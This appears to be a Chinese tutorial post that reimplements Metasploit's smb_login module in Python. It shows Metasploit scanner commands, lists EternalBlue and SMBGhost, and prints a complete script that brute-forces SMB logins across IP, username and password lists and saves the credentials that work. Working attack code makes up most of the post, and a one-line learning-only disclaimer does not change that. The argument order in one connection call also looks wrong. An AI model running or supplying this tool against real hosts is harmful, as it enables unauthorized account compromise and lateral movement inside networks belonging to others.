python实现SMB服务账号密码爆破功能 Metasploit 中的 smb_login
Server Message Block (SMB) Intro
服务器消息块 (SMB) 协议是一种网络文件共享协议,它允许计算机上的应用程序读取和写入文件并从计算机网络中的服务器程序请求服务。客户端可以读取、创建和修改远程服务器上的文件。
本文目标是用python实现 metasploit 中的 smb_login功能:
- Single Credential Login Scanner 单凭证登录扫描
- Multiple Credentials Login Scanner 多凭证登录扫描
- Credentials Collection 生成凭证
SMB 主要漏洞
漏洞名称 | CVE编号 | 发现日期 |
---|---|---|
EternalBlue | MS17-010 | 2017 |
SMBGhost | CVE-2020-0796 | 2020. 3 |
扫描smb服务可以查出版本漏洞,以及弱口令漏洞。
Metasploit 中的 smb_login
在运行Metasploit 后运行下面代码,user.txt 和 pass.txt分别为用户设置的用户名字典和密码字典 (也可以只设置单个用户名或密码),设置的扫描目标IP地址是RHOSTS。
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.10.16
set USER_FILE /root/users.txt
set PASS_FILE /root/pass.txt
run
smb_login 也可以扫描多个IP地址以及整个网段,只需要在RHIOSTS里设置:
set RHOSTS 192.168.10.10, 192.168.10.11
set RHOSTS 192.168.10.0/24
Python 实现 smb_login
python代码运用了SMBConnection库。实现了三个SMB扫描的基本功能:
- Single Credential Login Scanner 单凭证登录扫描
- Multiple Credentials Login Scanner 多凭证登录扫描
- Credentials Collection 生成凭证
注:此脚本仅供学习,任何非法使用与本人无关。
import os
from smb.SMBConnection import SMBConnection
############################ Clear Consle While Start a Loop ##############################
def clear():
os.system('cls') #on Windows System
############################ Collect Single Credential From User Input ##############################
def CollectCredential():
remote_ip = input('Enter Host IP:')
username = input('Enter SMB Username:')
password = input('Enter SMB Password:')
domain = input('Enter Domain Name:')
return(remote_ip,username,password,domain)
############################ Verify the Input File Direction ##############################
# If the direction cannot be found, set the input as an atribute.
def VerifyFile(up):
ver = []
try:
file = open(up, 'r')
data = file.readlines()
print('File Direction Verified.')
for line in data:
ver.append(line.strip())
except:
ver.append(up)
return ver
return ver
############################ Collect File Directions From User Input ##############################
#Support IP, username, password SMB brute force attack,
#user can input single attributes replace one to three attributes with files
def CollectFiles():
remote_ip = input('Enter Host IP or File Direction:')
remote_ip = VerifyFile(remote_ip)
username = input('Enter SMB Username or File Direction:')
username = VerifyFile(username)
password = input('Enter SMB Password or File Direction:')
password = VerifyFile(password)
domain = input('Enter Domain Name:')
return(remote_ip,username,password,domain)
############################ Generate Collected Credentials in to Files ##############################
def GenerateCredentials():
try:
with open("Credential.txt",mode='w',encoding='utf-8') as ff:
for i in range(len(credential)):
ff.write(credential[i]+' ')
if (i+1) % 4 == 0:
ff.write('\n')
except FileNotFoundError:
with open("Credential.txt",mode='w',encoding='utf-8') as ff:
for i in range(len(credential)):
ff.write(credential[i]+' ')
if (i+1) % 4 == 0:
ff.write('\n')
############################ SMB Functions Using SMBConnection ##############################
class SMB(object):
def __init__(self,remote_ip,username,password,domain):
self.remote_ip = remote_ip
self.username = username
self.password = password
self.domain = domain
############################ Use the Single Credential CollectCredential() to Login ##############################
def SingleLoginScanner(self):
my_name = ""
remote_name = ""
try:
self.conn = SMBConnection(self.username, self.password, my_name, remote_name, self.domain, use_ntlm_v2=True, sign_options=2, is_direct_tcp=True)
connected = self.conn.connect(self.remote_ip,445)
if connected == True:
print('Success :) %s USERNAME:%s PASSWORD:%s DOMAIN:%s' %(self.remote_ip, self.username, self.password, self.domain))
credential.append(self.remote_ip)
credential.append(self.username)
credential.append(self.password)
credential.append(self.domain)
print("Credential",credential)
else:
print('False :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' %(self.remote_ip, self.username, self.password, self.domain))
self.conn.close()
except Exception as e:
print(e)
############################ Use the Multiple Credentials CollectFiles() to Login ##############################
def MultiLoginScanner(self):
count = 0
my_name = ""
remote_name = ""
for ip in self.remote_ip:
for username in self.username:
for password in self.password:
count += 1
try:
self.conn = SMBConnection(username, password, self.domain, my_name, remote_name, use_ntlm_v2=True, sign_options=2, is_direct_tcp=True)
connected = self.conn.connect(ip,445)
if connected == True:
print('%d Success :) %s USERNAME:%s PASSWORD:%s DOMAIN:%s' %(count, ip, username, password, self.domain))
credential.append(ip)
credential.append(username)
credential.append(password)
credential.append(self.domain)
print("Credential",credential)
else:
print('%d False :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' %(count, ip, username, password, self.domain))
self.conn.close()
except Exception as e:
print('%d False :( %s USERNAME:%s PASSWORD:%s DOMAIN:%s' %(count, ip, username, password, self.domain))
print(e)
############################ SMB Functions Support User to Chose ##############################
def main():
while(1):
print('********************SMB PYTHON TOOKIT********************')
print('1. Single credential SMB Login Scanner')
print('2. Credentials list from file SMB Brute Force')
print('3. Generate Collected Credentials')
print('4. Quit')
print('*********************************************************\n')
chose = input('Type number to pick function:')
if chose == '1':
print('Only support to input single ip address, username and password.\n')
remote_ip,username,password,domain = CollectCredential()
smb = SMB(remote_ip,username,password,domain)
smb.SingleLoginScanner()
elif chose == '2':
print('Support Local File Directories contain ip/username/password or they will be recognized as a string.\n')
remote_ip,username,password,domain = CollectFiles()
smb = SMB(remote_ip,username,password,domain)
smb.MultiLoginScanner()
elif chose == '3':
print('Generating Successful Credentials in a txt file...\n')
GenerateCredentials()
print('Generated Credential.txt in the same python Directory.\n')
else:
print('Please input valid number!\n')
clear()
if __name__ == '__main__':
credential = []
main()
Github 代码:https://github.com/redemptionwxy/SMB-Python-Lateral-Movement-Toolkit
Reference
https://github.com/rahulinux/PythonPractice-/blob/master/samba_client.py
https://github.com/n3if/scripts/blob/master/smb_enumerator/smb_enumerator.py
https://pysmb.readthedocs.io/en/latest/api/smb_SMBConnection.html